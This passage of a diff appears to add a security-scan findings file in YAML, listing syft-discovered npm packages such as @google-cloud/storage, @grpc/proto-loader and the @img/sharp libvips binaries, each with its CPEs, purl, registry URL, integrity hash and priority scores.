cpe:2.3:a:\@google_cloud\/promisify:\@google_cloud\/promisify:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google:\@google-cloud\/promisify:4.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google:\@google_cloud\/promisify:4.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40google-cloud/promisify@4.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@google-cloud/promisify/-/promisify-4.0.0.tgz + integrity: sha512-Orxzlfb9c67A15cq2JQEyVc7wEsmFBmHjZWZYQMUyJ1qivXyMwdyNOs9odi79hze+2zqdTtu1E19IM/FtqZ10g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5c9bae4ce6812dd2 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @google-cloud/storage 7.19.0' + title: '@google-cloud/storage 7.19.0' + description: 'Package discovered: @google-cloud/storage 7.19.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: cefeafe40657f94b + name: '@google-cloud/storage' + version: 7.19.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@google-cloud\/storage:\@google-cloud\/storage:7.19.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google-cloud\/storage:\@google_cloud\/storage:7.19.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google_cloud\/storage:\@google-cloud\/storage:7.19.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google_cloud\/storage:\@google_cloud\/storage:7.19.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google:\@google-cloud\/storage:7.19.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@google:\@google_cloud\/storage:7.19.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40google-cloud/storage@7.19.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@google-cloud/storage/-/storage-7.19.0.tgz + integrity: sha512-n2FjE7NAOYyshogdc7KQOl/VZb4sneqPjWouSyia9CMDdMhRX5+RIbqalNmC7LOLzuLAN89VlF2HvG8na9G+zQ== + dependencies: + '@google-cloud/paginator': ^5.0.0 + '@google-cloud/projectify': ^4.0.0 + '@google-cloud/promisify': <4.1.0 + abort-controller: ^3.0.0 + async-retry: ^1.3.3 + duplexify: ^4.1.3 + fast-xml-parser: ^5.3.4 + gaxios: ^6.0.2 + google-auth-library: ^9.6.3 + html-entities: ^2.5.2 + mime: ^3.0.0 + p-limit: ^3.0.1 + retry-request: ^7.0.0 + teeny-request: ^9.0.0 + uuid: ^8.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 596d6a964fdec768 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @grpc/grpc-js 1.14.3' + title: '@grpc/grpc-js 1.14.3' + description: 'Package discovered: @grpc/grpc-js 1.14.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3f87a56430ddd85e + name: '@grpc/grpc-js' + version: 1.14.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:grpc:grpc:1.14.3:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/%40grpc/grpc-js@1.14.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.14.3.tgz + integrity: sha512-Iq8QQQ/7X3Sac15oB6p0FmUg/klxQvXLeileoqrTRGJYLV+/9tubbr9ipz0GKHjmXVsgFPo/+W+2cA8eNcR+XA== + dependencies: + '@grpc/proto-loader': ^0.8.0 + '@js-sdsl/ordered-map': ^4.4.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: feaff3ef7cf15262 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @grpc/proto-loader 0.7.15' + title: '@grpc/proto-loader 0.7.15' + description: 'Package discovered: @grpc/proto-loader 0.7.15' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 05aac3d8e010493a + name: '@grpc/proto-loader' + version: 0.7.15 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto-loader:0.7.15:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto_loader:0.7.15:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto-loader:0.7.15:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto_loader:0.7.15:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto-loader:0.7.15:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto_loader:0.7.15:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40grpc/proto-loader@0.7.15 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.7.15.tgz + integrity: sha512-tMXdRCfYVixjuFK+Hk0Q1s38gV9zDiDJfWL3h1rv4Qc39oILCu1TRTDt7+fGUI8K4G1Fj125Hx/ru3azECWTyQ== + dependencies: + lodash.camelcase: ^4.3.0 + long: ^5.0.0 + protobufjs: ^7.2.5 + yargs: ^17.7.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 81837b7c5203b82b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @grpc/proto-loader 0.8.0' + title: '@grpc/proto-loader 0.8.0' + description: 'Package discovered: @grpc/proto-loader 0.8.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1a954d92edb2b14f + name: '@grpc/proto-loader' + version: 0.8.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto-loader:0.8.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto_loader:0.8.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto-loader:0.8.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto_loader:0.8.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto-loader:0.8.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto_loader:0.8.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40grpc/proto-loader@0.8.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.8.0.tgz + integrity: sha512-rc1hOQtjIWGxcxpb9aHAfLpIctjEnsDehj0DAiVfBlmT84uvR0uUtN2hEi/ecvWVjXUGf5qPF4qEgiLOx1YIMQ== + dependencies: + lodash.camelcase: ^4.3.0 + long: ^5.0.0 + protobufjs: ^7.5.3 + yargs: ^17.7.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ba1c7d59d68ea634 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/colour 1.1.0' + title: '@img/colour 1.1.0' + description: 'Package discovered: @img/colour 1.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0b879a880de07100 + name: '@img/colour' + version: 1.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/colour:\@img\/colour:1.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/colour@1.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/colour/-/colour-1.1.0.tgz + integrity: sha512-Td76q7j57o/tLVdgS746cYARfSyxk8iEfRxewL9h4OMzYhbW4TAcppl0mT4eyqXddh6L/jwoM75mo7ixa/pCeQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 69b8f19d695c4a0d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-darwin-arm64 0.34.5' + title: '@img/sharp-darwin-arm64 0.34.5' + description: 'Package discovered: @img/sharp-darwin-arm64 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 535aeb1bbda7aba8 + name: '@img/sharp-darwin-arm64' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-darwin-arm64:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-darwin-arm64:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_darwin_arm64:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_darwin_arm64:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-darwin-arm64@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-darwin-arm64/-/sharp-darwin-arm64-0.34.5.tgz + integrity: sha512-imtQ3WMJXbMY4fxb/Ndp6HBTNVtWCUI0WdobyheGf5+ad6xX8VIDO8u2xE4qc/fr08CKG/7dDseFtn6M6g/r3w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d46a9ddb45c9c115 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-darwin-x64 0.34.5' + title: '@img/sharp-darwin-x64 0.34.5' + description: 'Package discovered: @img/sharp-darwin-x64 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0e26c2a4fd47f5b6 + name: '@img/sharp-darwin-x64' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-darwin-x64:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-darwin-x64:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_darwin_x64:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_darwin_x64:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-darwin-x64@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-darwin-x64/-/sharp-darwin-x64-0.34.5.tgz + integrity: sha512-YNEFAF/4KQ/PeW0N+r+aVVsoIY0/qxxikF2SWdp+NRkmMB7y9LBZAVqQ4yhGCm/H3H270OSykqmQMKLBhBJDEw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f40ef319dfe0f7ca + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-libvips-darwin-arm64 1.2.4' + title: '@img/sharp-libvips-darwin-arm64 1.2.4' + description: 'Package discovered: @img/sharp-libvips-darwin-arm64 1.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c127f66367bb283f + name: '@img/sharp-libvips-darwin-arm64' + version: 1.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: LGPL-3.0-or-later + spdxExpression: LGPL-3.0-or-later + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-arm64:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-arm64:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_arm64:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_arm64:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-libvips-darwin-arm64@1.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-libvips-darwin-arm64/-/sharp-libvips-darwin-arm64-1.2.4.tgz + integrity: sha512-zqjjo7RatFfFoP0MkQ51jfuFZBnVE2pRiaydKJ1G/rHZvnsrHAOcQALIi9sA5co5xenQdTugCvtb1cuf78Vf4g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f2d59ff4b7dad330 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-libvips-darwin-x64 1.2.4' + title: '@img/sharp-libvips-darwin-x64 1.2.4' + description: 'Package discovered: @img/sharp-libvips-darwin-x64 1.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9896d5c1cacbd583 + name: '@img/sharp-libvips-darwin-x64' + version: 1.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: LGPL-3.0-or-later + spdxExpression: LGPL-3.0-or-later + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-x64:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-x64:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_x64:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_x64:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-libvips-darwin-x64@1.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-libvips-darwin-x64/-/sharp-libvips-darwin-x64-1.2.4.tgz + integrity: sha512-1IOd5xfVhlGwX+zXv2N93k0yMONvUlANylbJw1eTah8K/Jtpi15KC+WSiaX/nBmbm2HxRM1gZ0nSdjSsrZbGKg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7b39904a53a17a82 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-libvips-linux-arm 1.2.4' + title: '@img/sharp-libvips-linux-arm 1.2.4' + description: 'Package discovered: @img/sharp-libvips-linux-arm 1.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 35db8dcfe65acc63 + name: '@img/sharp-libvips-linux-arm' + version: 1.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: LGPL-3.0-or-later + spdxExpression: LGPL-3.0-or-later + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-libvips-linux-arm@1.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-arm/-/sharp-libvips-linux-arm-1.2.4.tgz + integrity: sha512-bFI7xcKFELdiNCVov8e44Ia4u2byA+l3XtsAj+Q8tfCwO6BQ8iDojYdvoPMqsKDkuoOo+X6HZA0s0q11ANMQ8A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- 